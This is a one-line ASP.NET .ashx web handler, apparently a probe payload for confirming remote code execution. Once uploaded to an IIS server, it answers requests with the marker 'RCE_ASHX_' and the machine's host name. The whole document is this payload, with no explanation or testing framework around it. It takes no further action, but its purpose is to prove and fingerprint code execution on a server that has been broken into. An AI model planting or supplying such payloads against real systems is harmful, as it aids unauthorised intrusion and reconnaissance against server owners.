<%@ WebHandler Language="C#" Class="H" %>public class H:System.Web.IHttpHandler{public bool IsReusable{get{return true;}}public void ProcessRequest(System.Web.HttpContext c){c.Response.Write("RCE_ASHX_"+System.Environment.MachineName);}}